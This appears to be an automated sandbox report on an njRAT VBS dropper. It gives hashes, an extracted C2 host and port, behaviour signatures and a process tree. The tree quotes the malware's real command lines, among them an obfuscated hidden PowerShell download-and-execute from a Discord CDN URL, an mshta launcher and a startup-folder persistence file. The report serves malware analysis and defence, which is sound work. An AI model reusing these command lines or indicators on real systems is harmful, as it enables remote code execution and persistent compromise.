Analysis
- max time kernel: 149s
- max time network: 150s
- platform: windows10_x64
- resource: win10-en
- submitted: 15-09-2021 08:29
Static task: static1
Behavioral task: behavioral1
- Sample: e147c36f7e37e928c129b2337c90bda770f4cd437899932c723fd9d5392859ed.vbs
- Resource: win7v20210408
General
- Target: e147c36f7e37e928c129b2337c90bda770f4cd437899932c723fd9d5392859ed.vbs
- Size: 828B
- MD5: 9af0d5fbc14e3ac0ae409dfef6e04228
- SHA1: 931b3139830e5485f198bb72ecba50475e4c8df2
- SHA256: e147c36f7e37e928c129b2337c90bda770f4cd437899932c723fd9d5392859ed
- SHA512: fdca50df12edb4d7784a3c769908a695221456e8729b7ec61ec86b8328a18040c5aca7f2d6879f336b6c1a44b1323a8f1f05ff6dd14a4cbd9f233fedcd019f0e
Malware Config
Extracted
- Family: njrat
- Version: 0.7NC
- Botnet: NYAN CAT
- C2: envirat.duckdns.org:3013
- Mutex: 6de17d5355fa43eca7e
- reg_key: 6de17d5355fa43eca7e
- splitter: @!#&^%$
Signatures
- Blocklisted process makes network request (1 IoC)
  flow 3, pid 524, process powershell.exe
- Drops startup file (1 IoC)
  File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Login1.vbs (process powershell.exe)
- Suspicious use of SetThreadContext (1 IoC)
  PID 3924 (powershell.exe) set thread context of PID 2828 (aspnet_compiler.exe)
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Modifies registry class (1 IoC)
  Key created: \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings (process powershell.exe)
- Suspicious behavior: EnumeratesProcesses (6 IoCs)
  pid 524 powershell.exe (3 entries); pid 3924 powershell.exe (3 entries)
- Suspicious use of AdjustPrivilegeToken (35 IoCs)
  Token: SeDebugPrivilege, pid 524 powershell.exe
  Token: SeDebugPrivilege, pid 3924 powershell.exe
  Token: SeDebugPrivilege, pid 2828 aspnet_compiler.exe
  Token: 33 and Token: SeIncBasePriorityPrivilege, pid 2828 aspnet_compiler.exe, alternating (32 entries)
- Suspicious use of WriteProcessMemory (18 IoCs)
  PID 4000 WScript.exe wrote to memory of 524 powershell.exe (2 entries)
  PID 524 powershell.exe wrote to memory of 1956 WScript.exe (2 entries)
  PID 1956 WScript.exe wrote to memory of 4076 cmd.exe (2 entries)
  PID 4076 cmd.exe wrote to memory of 2832 mshta.exe (2 entries)
  PID 2832 mshta.exe wrote to memory of 3924 powershell.exe (2 entries)
  PID 3924 powershell.exe wrote to memory of 2828 aspnet_compiler.exe (8 entries)
Processes
- [1] C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e147c36f7e37e928c129b2337c90bda770f4cd437899932c723fd9d5392859ed.vbs"
  - Suspicious use of WriteProcessMemory
  - [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExEcUtIoNPoLiCy ByPAsS -wInDoWStYlE hIdDEn -command Invoke-Expression(New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,83,116,114,105,110,103)).Invoke('https://cdn.discordapp.com/attachments/876945743724822550/877222584595402823/Fucking.txt');$results
    (the [char[]] array in the command line decodes to the method name DownloadString)
    - Blocklisted process makes network request
    - Drops startup file
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\System32\WScript.exe
      Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Login1.VBS"
      - Suspicious use of WriteProcessMemory
      - [4] C:\Windows\system32\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\SystemLogin.bat" "
        - Suspicious use of WriteProcessMemory
        - [5] C:\Windows\system32\mshta.exe
          Command line: mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ExecutionPolicy Bypass & 'C:\Users\Public\myScript.ps1'"", 0:close")
          - Suspicious use of WriteProcessMemory
          - [6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & 'C:\Users\Public\myScript.ps1'
            - Suspicious use of SetThreadContext
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory
            - [7] C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
              - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Downloads
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Login1.VBS
  MD5: 558a8b7b3fdef4ca79110f8cfd126694
  SHA1: d6e96ca27f701b3f4c24885dacd14c762a9d36b0
  SHA256: 38c9b7098371b39e61a6dcf78370dddf47f4d2be2c32704a2a0310b76c52c0f7
  SHA512: 37d6d72d5f518aaf1cf37154ed75aec7c7f11677508874eb3c3cbf44ca0ebeb22112dfa5f45a2f5d821604c521092ef768016d83f948444a9ff2e2a812d1c283
- C:\Users\Admin\AppData\Roaming\SystemLogin.bat
  MD5: 7f85382953fde20b101039d48673dbd2
  SHA1: 5ebaa67f5862b2925d9029f4761b7e2ce9a99dd9
  SHA256: fde417ad1b13a97acfa8e409789a92c4c3ddf6303851337ca31b94bfac634e4f
  SHA512: 6e93b74237844e1f78cd3ae64c0a00702c0b1aa1febda2feb52ca99b8a58ab2efd0c7b8351f040bf56a8bc1a8f5b1f57c4a9ffed46f8a2f9cba898e8e138ce46
- C:\Users\Public\myScript.ps1
  MD5: 317f5c7ef5b887966f963c21a60e2889
  SHA1: 5078bdb3e7376202c7253a8b428a360e1c047863
  SHA256: cd7143c00ef7711ccdcc6877d6d393e4f6e2bb2aef26bf2214b81e660f7c7cdd
  SHA512: e4d6590082671997ef08550d48b5ff43dd63a1811c4b883bbe75a9a5e22087b5928be43e624632bdaf8c01d4334ae397c672d1695900d1bd25e7a27a03b10750